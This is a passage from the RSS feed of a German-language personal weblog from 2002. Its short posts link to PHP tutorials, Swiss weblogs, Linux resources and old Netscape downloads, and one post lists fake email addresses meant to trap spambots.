  15941.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=77</guid>
  15942.    <dc:creator>Andreas Jaggi</dc:creator>
  15943.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15944.    <pubDate>Sun, 01 Sep 2002 21:45:00 +0000</pubDate>
  15945.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15946.    <description><![CDATA[Warum müssen die eigentlich ihre Festplatten immer so bauen, dass sie regelmässig jeden Monat (und zu jedem anderen ungünstigsten Zeitpunkt) den Geist aufgeben, crashen, abschmieren, sich selbst zerstören ... ?<br>Nachdem ich nun den ganzen Tag gebastelt habe läuft das System nun wieder so, dass man eine Anwendung aufstarten kann, ohne dass man gleich 2h warten muss.<br><a href="https://blog.x-way.org/images/defrag.gif"><b>Hier</b></a> ein Screenshot nach der Defragmentierung von C:.<br>Wo ist eigentlich der Unterschied zwischen dem oberen und dem unteren Balken?<br>Scheiss Computer ...
  15947. ]]></description>
  15948.    <content:encoded><![CDATA[Warum müssen die eigentlich ihre Festplatten immer so bauen, dass sie regelmässig jeden Monat (und zu jedem anderen ungünstigsten Zeitpunkt) den Geist aufgeben, crashen, abschmieren, sich selbst zerstören ... ?<br>Nachdem ich nun den ganzen Tag gebastelt habe läuft das System nun wieder so, dass man eine Anwendung aufstarten kann, ohne dass man gleich 2h warten muss.<br><a href="https://blog.x-way.org/images/defrag.gif"><b>Hier</b></a> ein Screenshot nach der Defragmentierung von C:.<br>Wo ist eigentlich der Unterschied zwischen dem oberen und dem unteren Balken?<br>Scheiss Computer ...
  15949. ]]></content:encoded>
  15950.  </item>
  15951.  
  15952.  <item>
  15953.    <title>Im Frühling spriessen die Blumen, im Herbst die Weblogs</title>
  15954.    <link>https://blog.x-way.org/Misc/2002/09/01/Im_Fruehling_spriessen_die_Blumen_im_Herbst_die_Weblogs.html</link>
  15955.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=76</guid>
  15956.    <dc:creator>Andreas Jaggi</dc:creator>
  15957.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15958.    <pubDate>Sun, 01 Sep 2002 13:21:00 +0000</pubDate>
  15959.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15960.    <description><![CDATA[<a href="http://quimbo.antville.org/" target="_blank"><b>Hier</b></a> ist schon wieder ein CH-Weblog entstanden.
  15961. ]]></description>
  15962.    <content:encoded><![CDATA[<a href="http://quimbo.antville.org/" target="_blank"><b>Hier</b></a> ist schon wieder ein CH-Weblog entstanden.
  15963. ]]></content:encoded>
  15964.  </item>
  15965.  
  15966.  <item>
  15967.    <title>Spieglein, Spieglein an der Wand ..</title>
  15968.    <link>https://blog.x-way.org/Misc/2002/08/30/Spieglein_Spieglein_an_der_Wand_.html</link>
  15969.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=75</guid>
  15970.    <dc:creator>Andreas Jaggi</dc:creator>
  15971.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15972.    <pubDate>Fri, 30 Aug 2002 22:16:00 +0000</pubDate>
  15973.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15974.    <description><![CDATA[Weil <a href="http://www.spiegel.de/" target="_blank"><b>der Spiegel</b></a> in <a href="http://www.spiegel.de/netzwelt/netzkultur/0,1518,211412,00.html" target="_blank"><b>einem Artikel</b></a> auf <a href="https://web.archive.org/web/20020603121748/http://www.blogworld.de/karte.php" target="_blank"><b>diese URL</b></a> verweist, habe ich nun ganz viele Referrers von <a href="https://web.archive.org/web/20020615131358/http://www.blogworld.de/schweiz.php" target="_blank"><b>dieser URL</b></a>.<br>Na dann sage ich nur eines:<br><br><span style="font-size: 20px; color: #FF0000;">Herzlich Willkommen!</span>
  15975. ]]></description>
  15976.    <content:encoded><![CDATA[Weil <a href="http://www.spiegel.de/" target="_blank"><b>der Spiegel</b></a> in <a href="http://www.spiegel.de/netzwelt/netzkultur/0,1518,211412,00.html" target="_blank"><b>einem Artikel</b></a> auf <a href="https://web.archive.org/web/20020603121748/http://www.blogworld.de/karte.php" target="_blank"><b>diese URL</b></a> verweist, habe ich nun ganz viele Referrers von <a href="https://web.archive.org/web/20020615131358/http://www.blogworld.de/schweiz.php" target="_blank"><b>dieser URL</b></a>.<br>Na dann sage ich nur eines:<br><br><span style="font-size: 20px; color: #FF0000;">Herzlich Willkommen!</span>
  15977. ]]></content:encoded>
  15978.  </item>
  15979.  
  15980.  <item>
  15981.    <title>kant.ch</title>
  15982.    <link>https://blog.x-way.org/Misc/2002/08/29/kantch.html</link>
  15983.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=74</guid>
  15984.    <dc:creator>Andreas Jaggi</dc:creator>
  15985.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15986.    <pubDate>Thu, 29 Aug 2002 01:41:00 +0000</pubDate>
  15987.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15988.    <description><![CDATA[Ein weiterer <a href="https://web.archive.org/web/20020925004847/http://kant.ch/"><b>CH-Weblog</b></a>. Daher auch nicht sonderlich verwunderlich dass er auf <a href="https://web.archive.org/web/20060314141948/http://sunlog.ch/rubrik/1/de/" target="_blank"><b>sunlog</b></a> basiert :-)
  15989. ]]></description>
  15990.    <content:encoded><![CDATA[Ein weiterer <a href="https://web.archive.org/web/20020925004847/http://kant.ch/"><b>CH-Weblog</b></a>. Daher auch nicht sonderlich verwunderlich dass er auf <a href="https://web.archive.org/web/20060314141948/http://sunlog.ch/rubrik/1/de/" target="_blank"><b>sunlog</b></a> basiert :-)
  15991. ]]></content:encoded>
  15992.  </item>
  15993.  
  15994.  <item>
  15995.    <title>Google-API</title>
  15996.    <link>https://blog.x-way.org/Coding/2002/08/29/Google-API.html</link>
  15997.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=73</guid>
  15998.    <dc:creator>Andreas Jaggi</dc:creator>
  15999.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16000.    <pubDate>Thu, 29 Aug 2002 01:29:00 +0000</pubDate>
  16001.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  16002.    <description><![CDATA[Bisher hatte ich vergeblich gesucht, aber jetzt habe ich es gefunden:<br><a href="http://www.devshed.com/Server_Side/PHP/GoogleAPI/page1.html" target="_blank"><b>Hiermit</b></a> kann man auch mit PHP via SOAP auf die Google-API zugreifen.<br><br><a href="http://www.devshed.com/Server_Side/PHP" target="_blank"><b>Hier</b></a> hat es noch viele weitere "inspirierende" PHP-Artikel :-)
  16003. ]]></description>
  16004.    <content:encoded><![CDATA[Bisher hatte ich vergeblich gesucht, aber jetzt habe ich es gefunden:<br><a href="http://www.devshed.com/Server_Side/PHP/GoogleAPI/page1.html" target="_blank"><b>Hiermit</b></a> kann man auch mit PHP via SOAP auf die Google-API zugreifen.<br><br><a href="http://www.devshed.com/Server_Side/PHP" target="_blank"><b>Hier</b></a> hat es noch viele weitere "inspirierende" PHP-Artikel :-)
  16005. ]]></content:encoded>
  16006.  </item>
  16007.  
  16008.  <item>
  16009.    <title>PHP-GTK</title>
  16010.    <link>https://blog.x-way.org/Coding/2002/08/29/PHP-GTK1.html</link>
  16011.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=72</guid>
  16012.    <dc:creator>Andreas Jaggi</dc:creator>
  16013.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16014.    <pubDate>Thu, 29 Aug 2002 01:18:00 +0000</pubDate>
  16015.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  16016.    <description><![CDATA[Und <a href="http://www.devarticles.com/content.php?articleId=97" target="_blank"><b>hier</b></a> noch eine Einführung in PHP-GTK. Inklusive einem simplen GUI für MySQL.
  16017. ]]></description>
  16018.    <content:encoded><![CDATA[Und <a href="http://www.devarticles.com/content.php?articleId=97" target="_blank"><b>hier</b></a> noch eine Einführung in PHP-GTK. Inklusive einem simplen GUI für MySQL.
  16019. ]]></content:encoded>
  16020.  </item>
  16021.  
  16022.  <item>
  16023.    <title>Eigenes Session Management</title>
  16024.    <link>https://blog.x-way.org/Coding/2002/08/29/Eigenes_Session_Management.html</link>
  16025.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=71</guid>
  16026.    <dc:creator>Andreas Jaggi</dc:creator>
  16027.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16028.    <pubDate>Thu, 29 Aug 2002 01:04:00 +0000</pubDate>
  16029.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  16030.    <description><![CDATA[<a href="http://www.devarticles.com/content.php?articleId=171" target="_blank"><b>Dieser Artikel</b></a> beschreibt, wie man mit PHP ein eigenes Session Management programmieren kann; ohne $_SESSION['???'] zu benützen.
  16031. ]]></description>
  16032.    <content:encoded><![CDATA[<a href="http://www.devarticles.com/content.php?articleId=171" target="_blank"><b>Dieser Artikel</b></a> beschreibt, wie man mit PHP ein eigenes Session Management programmieren kann; ohne $_SESSION['???'] zu benützen.
  16033. ]]></content:encoded>
  16034.  </item>
  16035.  
  16036.  <item>
  16037.    <title>linuxinfozentrum.ch</title>
  16038.    <link>https://blog.x-way.org/Linux/2002/08/27/linuxinfozentrumch.html</link>
  16039.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=70</guid>
  16040.    <dc:creator>Andreas Jaggi</dc:creator>
  16041.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16042.    <pubDate>Tue, 27 Aug 2002 14:27:00 +0000</pubDate>
  16043.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16044.    <description><![CDATA[<a href="http://www.linuxinfozentrum.ch/" target="_blank"><b>Hier</b></a> hat es viele vielfältige Informationen über Linux, insbesondere einen IMHO detaillierten Bereich über Mini Distributionen.
  16045. ]]></description>
  16046.    <content:encoded><![CDATA[<a href="http://www.linuxinfozentrum.ch/" target="_blank"><b>Hier</b></a> hat es viele vielfältige Informationen über Linux, insbesondere einen IMHO detaillierten Bereich über Mini Distributionen.
  16047. ]]></content:encoded>
  16048.  </item>
  16049.  
  16050.  <item>
  16051.    <title>1.</title>
  16052.    <link>https://blog.x-way.org/Misc/2002/08/27/1.html</link>
  16053.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=69</guid>
  16054.    <dc:creator>Andreas Jaggi</dc:creator>
  16055.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16056.    <pubDate>Tue, 27 Aug 2002 14:21:00 +0000</pubDate>
  16057.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16058.    <description><![CDATA[<a href="http://www.google.com/search?q=X-Way"><b>Das</b></a> ist wieder einmal eine erfreuliche Überraschung :-)
  16059. ]]></description>
  16060.    <content:encoded><![CDATA[<a href="http://www.google.com/search?q=X-Way"><b>Das</b></a> ist wieder einmal eine erfreuliche Überraschung :-)
  16061. ]]></content:encoded>
  16062.  </item>
  16063.  
  16064.  <item>
  16065.    <title>Maturaarbeit - Praxis</title>
  16066.    <link>https://blog.x-way.org/School/2002/08/26/Maturaarbeit_-_Praxis.html</link>
  16067.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=68</guid>
  16068.    <dc:creator>Andreas Jaggi</dc:creator>
  16069.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16070.    <pubDate>Mon, 26 Aug 2002 21:33:00 +0000</pubDate>
  16071.    <category domain="https://blog.x-way.org/School">School</category>
  16072.    <description><![CDATA[Im Zuge meiner Maturaarbeit zum Thema Usability entsteht <a href="https://web.archive.org/web/20030719065955/http://www.waterwave.ch/maturaarbeit/"><b>hier</b></a> eine benutzerfreundlichere Version <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch" target="_blank"><b>dieser</b></a> Website.<br>Kritik ist herzlich willkommen :-)
  16073. ]]></description>
  16074.    <content:encoded><![CDATA[Im Zuge meiner Maturaarbeit zum Thema Usability entsteht <a href="https://web.archive.org/web/20030719065955/http://www.waterwave.ch/maturaarbeit/"><b>hier</b></a> eine benutzerfreundlichere Version <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch" target="_blank"><b>dieser</b></a> Website.<br>Kritik ist herzlich willkommen :-)
  16075. ]]></content:encoded>
  16076.  </item>
  16077.  
  16078.  <item>
  16079.    <title>Dosenfleisch - Spam!</title>
  16080.    <link>https://blog.x-way.org/Misc/2002/08/24/Dosenfleisch_-_Spam.html</link>
  16081.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=67</guid>
  16082.    <dc:creator>Andreas Jaggi</dc:creator>
  16083.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16084.    <pubDate>Sat, 24 Aug 2002 01:53:00 +0000</pubDate>
  16085.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16086.    <description><![CDATA[<a href="http://www.schockwellenreiter.de/webdesign/spam.html" target="_blank"><b>Der Schockwellenreiter</b></a> hat einen innovative Idee im alltäglichen Krieg gegen Spam(bots). Basierend auf <a href="http://www.ideenreich.com/netlife/spam_1.shtml" target="_blank"><b>einem Artikel von ideenreich.com</b></a>.<br><a href="http://www.pepilog.de/eintrag-00356.htm" target="_blank"><b>Pepino</b></a> hat auch schon <a href="http://www.pepilog.de/downloads/allgemein.htm" target="_blank"><b>ein passendes PHP-Script</b></a> geschrieben.<br><br>Hier nun ein paar Fake-Adressen: (muss mir noch überlegen, wie ich die tägliche Ration davon irgendwo sinnvoll intergrieren kann :-)<br><br><span style="font-size: 8px;"><a href="mailto:hxqmbr@sxqtvjhuwm.it" style="color: #FFFF00;"><b>hxqmbr@sxqtvjhuwm.it</b></a>, <a href="mailto:guu@oijduzfaiqwrn.eu" style="color: #FFFF11;"><b>guu@oijduzfaiqwrn.eu</b></a>, <a href="mailto:iqlwhndcl@uqmebebevpkoaucbwgfx.ch" style="color: #FFFF22;"><b>iqlwhndcl@uqmebebevpkoaucbwgfx.ch</b></a>, <a href="mailto:oau@rekerntvbyvtw.ar" style="color: #FFFF33;"><b>oau@rekerntvbyvtw.ar</b></a>, <a href="mailto:pvc@rzsozctuexyickvvcbon.net" style="color: #FFFF33;"><b>pvc@rzsozctuexyickvvcbon.net</b></a>, <a href="mailto:gyczaxdv@edvirkffdxynrwvfx.pl" style="color: #FFFF44;"><b>gyczaxdv@edvirkffdxynrwvfx.pl</b></a>, <a href="mailto:wtgxvuzqik@pfpdnglxnf.com" style="color: #FFFF55;"><b>wtgxvuzqik@pfpdnglxnf.com</b></a>, <a href="mailto:lwxynheb@zfchtmxfeitsydc.ca" style="color: #FFFF66;"><b>lwxynheb@zfchtmxfeitsydc.ca</b></a>, <a href="mailto:czxyagp@trijtxd.de" style="color: #FFFF66;"><b>czxyagp@trijtxd.de</b></a>, <a href="mailto:qaebx@xhwovsgfp.ca" style="color: #FFFF77;"><b>qaebx@xhwovsgfp.ca</b></a>, <a href="mailto:xofnz@tzbarznby.it" style="color: #FFFF88;"><b>xofnz@tzbarznby.it</b></a>, <a href="mailto:syoxdnbgeh@pumedyoib.com" style="color: #FFFF99;"><b>syoxdnbgeh@pumedyoib.com</b></a>, <a href="mailto:zxidswacq@phyl.eu" style="color: #FFFF99;"><b>zxidswacq@phyl.eu</b></a>, <a href="mailto:htgrl@decfdppoohtrfdcglqu.br" style="color: #FFFFAA;"><b>htgrl@decfdppoohtrfdcglqu.br</b></a>, <a href="mailto:ksdrfqljj@zctzh.biz" style="color: #FFFFBB;"><b>ksdrfqljj@zctzh.biz</b></a>, <a href="mailto:qfwemfbm@ojpndrdwygeuj.mil" style="color: #FFFFCC;"><b>qfwemfbm@ojpndrdwygeuj.mil</b></a>, <a href="mailto:qkvigcdm@yjcsjwoeo.ru" style="color: #FFFFCC;"><b>qkvigcdm@yjcsjwoeo.ru</b></a>, <a href="mailto:owy@kpphkxbcmjicmza.com" style="color: #FFFFDD;"><b>owy@kpphkxbcmjicmza.com</b></a>, <a href="mailto:eowy@xyimdphk.de" style="color: #FFFFEE;"><b>eowy@xyimdphk.de</b></a>, <a href="mailto:lcy@xabaguqaeg.st" style="color: #FFFFFF;"><b>lcy@xabaguqaeg.st</b></a></span>
  16087. ]]></description>
  16088.    <content:encoded><![CDATA[<a href="http://www.schockwellenreiter.de/webdesign/spam.html" target="_blank"><b>Der Schockwellenreiter</b></a> hat einen innovative Idee im alltäglichen Krieg gegen Spam(bots). Basierend auf <a href="http://www.ideenreich.com/netlife/spam_1.shtml" target="_blank"><b>einem Artikel von ideenreich.com</b></a>.<br><a href="http://www.pepilog.de/eintrag-00356.htm" target="_blank"><b>Pepino</b></a> hat auch schon <a href="http://www.pepilog.de/downloads/allgemein.htm" target="_blank"><b>ein passendes PHP-Script</b></a> geschrieben.<br><br>Hier nun ein paar Fake-Adressen: (muss mir noch überlegen, wie ich die tägliche Ration davon irgendwo sinnvoll intergrieren kann :-)<br><br><span style="font-size: 8px;"><a href="mailto:hxqmbr@sxqtvjhuwm.it" style="color: #FFFF00;"><b>hxqmbr@sxqtvjhuwm.it</b></a>, <a href="mailto:guu@oijduzfaiqwrn.eu" style="color: #FFFF11;"><b>guu@oijduzfaiqwrn.eu</b></a>, <a href="mailto:iqlwhndcl@uqmebebevpkoaucbwgfx.ch" style="color: #FFFF22;"><b>iqlwhndcl@uqmebebevpkoaucbwgfx.ch</b></a>, <a href="mailto:oau@rekerntvbyvtw.ar" style="color: #FFFF33;"><b>oau@rekerntvbyvtw.ar</b></a>, <a href="mailto:pvc@rzsozctuexyickvvcbon.net" style="color: #FFFF33;"><b>pvc@rzsozctuexyickvvcbon.net</b></a>, <a href="mailto:gyczaxdv@edvirkffdxynrwvfx.pl" style="color: #FFFF44;"><b>gyczaxdv@edvirkffdxynrwvfx.pl</b></a>, <a href="mailto:wtgxvuzqik@pfpdnglxnf.com" style="color: #FFFF55;"><b>wtgxvuzqik@pfpdnglxnf.com</b></a>, <a href="mailto:lwxynheb@zfchtmxfeitsydc.ca" style="color: #FFFF66;"><b>lwxynheb@zfchtmxfeitsydc.ca</b></a>, <a href="mailto:czxyagp@trijtxd.de" style="color: #FFFF66;"><b>czxyagp@trijtxd.de</b></a>, <a href="mailto:qaebx@xhwovsgfp.ca" style="color: #FFFF77;"><b>qaebx@xhwovsgfp.ca</b></a>, <a href="mailto:xofnz@tzbarznby.it" style="color: #FFFF88;"><b>xofnz@tzbarznby.it</b></a>, <a href="mailto:syoxdnbgeh@pumedyoib.com" style="color: #FFFF99;"><b>syoxdnbgeh@pumedyoib.com</b></a>, <a href="mailto:zxidswacq@phyl.eu" style="color: #FFFF99;"><b>zxidswacq@phyl.eu</b></a>, <a href="mailto:htgrl@decfdppoohtrfdcglqu.br" style="color: #FFFFAA;"><b>htgrl@decfdppoohtrfdcglqu.br</b></a>, <a href="mailto:ksdrfqljj@zctzh.biz" style="color: #FFFFBB;"><b>ksdrfqljj@zctzh.biz</b></a>, <a href="mailto:qfwemfbm@ojpndrdwygeuj.mil" style="color: #FFFFCC;"><b>qfwemfbm@ojpndrdwygeuj.mil</b></a>, <a href="mailto:qkvigcdm@yjcsjwoeo.ru" style="color: #FFFFCC;"><b>qkvigcdm@yjcsjwoeo.ru</b></a>, <a href="mailto:owy@kpphkxbcmjicmza.com" style="color: #FFFFDD;"><b>owy@kpphkxbcmjicmza.com</b></a>, <a href="mailto:eowy@xyimdphk.de" style="color: #FFFFEE;"><b>eowy@xyimdphk.de</b></a>, <a href="mailto:lcy@xabaguqaeg.st" style="color: #FFFFFF;"><b>lcy@xabaguqaeg.st</b></a></span>
  16089. ]]></content:encoded>
  16090.  </item>
  16091.  
  16092.  <item>
  16093.    <title>Da kriegt man den Mund gar nicht mehr zu!</title>
  16094.    <link>https://blog.x-way.org/Tech/2002/08/22/Da_kriegt_man_den_Mund_gar_nicht_mehr_zu.html</link>
  16095.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=66</guid>
  16096.    <dc:creator>Andreas Jaggi</dc:creator>
  16097.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16098.    <pubDate>Thu, 22 Aug 2002 20:21:00 +0000</pubDate>
  16099.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  16100.    <description><![CDATA[Beim <a href="http://www.listan.de/" target="_blank"><b>Webshop von listan.de</b></a>  hat es viele schöne Gehäuse.<br>Das hier ist mein Favorit:<br><br><img alt="Avance Case" src="https://blog.x-way.org/images/avance-case.jpg">
  16101. ]]></description>
  16102.    <content:encoded><![CDATA[Beim <a href="http://www.listan.de/" target="_blank"><b>Webshop von listan.de</b></a>  hat es viele schöne Gehäuse.<br>Das hier ist mein Favorit:<br><br><img alt="Avance Case" src="https://blog.x-way.org/images/avance-case.jpg">
  16103. ]]></content:encoded>
  16104.  </item>
  16105.  
  16106.  <item>
  16107.    <title>Build Your Linux Disk</title>
  16108.    <link>https://blog.x-way.org/Linux/2002/08/22/Build_Your_Linux_Disk.html</link>
  16109.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=65</guid>
  16110.    <dc:creator>Andreas Jaggi</dc:creator>
  16111.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16112.    <pubDate>Thu, 22 Aug 2002 00:32:00 +0000</pubDate>
  16113.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16114.    <description><![CDATA[<a href="http://byld.sourceforge.net/" target="_blank"><b>Damit</b></a> kann man sich eine lauffähige, wenn auch sehr abgespeckte, Linux-Distribution auf <b>einer</b> Diskette erstellen.<br>Wenn ich einmal Zeit finde(n werde), könnte ich ja versuchen, mir eine Disk zu basteln mit Netzwerktools und Samba.<br>Würde den W2k-"Administrator" des Gymnasiums - der Lehrer, welcher weiss, wie und wo man den Computer einschaltet - sicherlich ganz besonders freuen, wenn nebst den andauernd gamenden "Terzis" (was <b>verboten</b> ist liebe Mitschüler!) auch noch so ein PC-Freak mit Linux anmarschiert.
  16115. ]]></description>
  16116.    <content:encoded><![CDATA[<a href="http://byld.sourceforge.net/" target="_blank"><b>Damit</b></a> kann man sich eine lauffähige, wenn auch sehr abgespeckte, Linux-Distribution auf <b>einer</b> Diskette erstellen.<br>Wenn ich einmal Zeit finde(n werde), könnte ich ja versuchen, mir eine Disk zu basteln mit Netzwerktools und Samba.<br>Würde den W2k-"Administrator" des Gymnasiums - der Lehrer, welcher weiss, wie und wo man den Computer einschaltet - sicherlich ganz besonders freuen, wenn nebst den andauernd gamenden "Terzis" (was <b>verboten</b> ist liebe Mitschüler!) auch noch so ein PC-Freak mit Linux anmarschiert.
  16117. ]]></content:encoded>
  16118.  </item>
  16119.  
  16120.  <item>
  16121.    <title>Wie geht's?</title>
  16122.    <link>https://blog.x-way.org/Misc/2002/08/20/Wie_gehts.html</link>
  16123.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=64</guid>
  16124.    <dc:creator>Andreas Jaggi</dc:creator>
  16125.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16126.    <pubDate>Tue, 20 Aug 2002 17:22:00 +0000</pubDate>
  16127.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16128.    <description><![CDATA[Für alle Spiesser und Spiesserinnen und all jene, welche nicht dazu verkommen wollen ;-)<br><br><a href="https://web.archive.org/web/20020804163056/http://www.rageagainstwiegehts.de.vu/" target="_blank"><b>Wie geht's?</b></a> <br><br><b>Update:</b> Leider darf ich feststellen, dass die Seite momentan nicht gefunden werden will. Hoffentlich zeigt sie sich bald wieder :-)
  16129. ]]></description>
  16130.    <content:encoded><![CDATA[Für alle Spiesser und Spiesserinnen und all jene, welche nicht dazu verkommen wollen ;-)<br><br><a href="https://web.archive.org/web/20020804163056/http://www.rageagainstwiegehts.de.vu/" target="_blank"><b>Wie geht's?</b></a> <br><br><b>Update:</b> Leider darf ich feststellen, dass die Seite momentan nicht gefunden werden will. Hoffentlich zeigt sie sich bald wieder :-)
  16131. ]]></content:encoded>
  16132.  </item>
  16133.  
  16134.  <item>
  16135.    <title>Trau nur einer Statistik, die du selbst gefälscht hast.</title>
  16136.    <link>https://blog.x-way.org/Misc/2002/08/19/Trau_nur_einer_Statistik_die_du_selbst_gefaelscht_hast.html</link>
  16137.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=63</guid>
  16138.    <dc:creator>Andreas Jaggi</dc:creator>
  16139.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16140.    <pubDate>Mon, 19 Aug 2002 23:38:00 +0000</pubDate>
  16141.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16142.    <description><![CDATA[Nun kann man unter Statistik noch ein weiteres Diagramm finden: Die Verteilung meiner Postings auf die verschiedenen Kategorien.<br><br>Mit 32 Posts führt (oh wie erstaunlich ;-) die Kategorie Misc. Gleich dahinter folgt Linux *freu*. Danach Webdesign, Coding und die restlichen scheinbar unbeliebten Kategorien.<br>(Stimmt natürlich nicht. Mein CMS ist halt noch nicht soweit, das es veröffentlich werden kann)
  16143. ]]></description>
  16144.    <content:encoded><![CDATA[Nun kann man unter Statistik noch ein weiteres Diagramm finden: Die Verteilung meiner Postings auf die verschiedenen Kategorien.<br><br>Mit 32 Posts führt (oh wie erstaunlich ;-) die Kategorie Misc. Gleich dahinter folgt Linux *freu*. Danach Webdesign, Coding und die restlichen scheinbar unbeliebten Kategorien.<br>(Stimmt natürlich nicht. Mein CMS ist halt noch nicht soweit, das es veröffentlich werden kann)
  16145. ]]></content:encoded>
  16146.  </item>
  16147.  
  16148.  <item>
  16149.    <title>Netscape 2.02</title>
  16150.    <link>https://blog.x-way.org/Webdesign/2002/08/19/Netscape_202.html</link>
  16151.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=62</guid>
  16152.    <dc:creator>Andreas Jaggi</dc:creator>
  16153.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16154.    <pubDate>Mon, 19 Aug 2002 22:05:00 +0000</pubDate>
  16155.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  16156.    <description><![CDATA[Für meine Maturaarbeit benötige ich zum Testen eine alten/älteren Netscape Browser. Nach einer unendlich langen Klickerei, bin ich <a href="https://web.archive.org/web/20020803024814/http://wp.netscape.com/download/archive.html" target="_blank"><b>hier</b></a> fündig geworden. Dort gibts von Netcape 2.02 bis 6.2.3 alles was das Herz begehrt.
  16157. ]]></description>
  16158.    <content:encoded><![CDATA[Für meine Maturaarbeit benötige ich zum Testen eine alten/älteren Netscape Browser. Nach einer unendlich langen Klickerei, bin ich <a href="https://web.archive.org/web/20020803024814/http://wp.netscape.com/download/archive.html" target="_blank"><b>hier</b></a> fündig geworden. Dort gibts von Netcape 2.02 bis 6.2.3 alles was das Herz begehrt.
  16159. ]]></content:encoded>
  16160.  </item>
  16161.  
  16162.  <item>
  16163.    <title>Zaurus-Flash</title>
  16164.    <link>https://blog.x-way.org/Linux/2002/08/19/Zaurus-Flash.html</link>
  16165.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=61</guid>
  16166.    <dc:creator>Andreas Jaggi</dc:creator>
  16167.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16168.    <pubDate>Mon, 19 Aug 2002 12:14:00 +0000</pubDate>
  16169.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16170.    <description><![CDATA[<a href="http://www.sharp-usa.com/demo3d/sl_5500.swf" target="_blank"><b>Hier</b></a> findet man eine Flash-Präsentation des Sharp Zaurus. :-)
  16171. ]]></description>
  16172.    <content:encoded><![CDATA[<a href="http://www.sharp-usa.com/demo3d/sl_5500.swf" target="_blank"><b>Hier</b></a> findet man eine Flash-Präsentation des Sharp Zaurus. :-)
  16173. ]]></content:encoded>
  16174.  </item>
  16175.  
  16176.  <item>
  16177.    <title>Mensch ärgere dich nicht</title>
  16178.    <link>https://blog.x-way.org/Misc/2002/08/18/Mensch_aergere_dich_nicht.html</link>
  16179.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=60</guid>
  16180.    <dc:creator>Andreas Jaggi</dc:creator>
  16181.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16182.    <pubDate>Sun, 18 Aug 2002 15:36:00 +0000</pubDate>
  16183.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16184.    <description><![CDATA[Zufällig habe ich <a href="http://weltwoche.ch/ressort_bericht.asp?asset_id=2952&amp;category_id=60" target="_blank"><b>einen Artikel</b></a> gefunden, welcher das Thema Videogames endlich einmal annähernd neutral angeht.<br>(Nicht so wie die Beiträge der Hass-Kampagne nach dem Amoklauf von Erfurt, welche auf Vermutungen und ohne Recherchen geschrieben wurden.)
  16185. ]]></description>
  16186.    <content:encoded><![CDATA[Zufällig habe ich <a href="http://weltwoche.ch/ressort_bericht.asp?asset_id=2952&amp;category_id=60" target="_blank"><b>einen Artikel</b></a> gefunden, welcher das Thema Videogames endlich einmal annähernd neutral angeht.<br>(Nicht so wie die Beiträge der Hass-Kampagne nach dem Amoklauf von Erfurt, welche auf Vermutungen und ohne Recherchen geschrieben wurden.)
  16187. ]]></content:encoded>
  16188.  </item>
  16189.  
  16190.  <item>
  16191.    <title>baaa!</title>
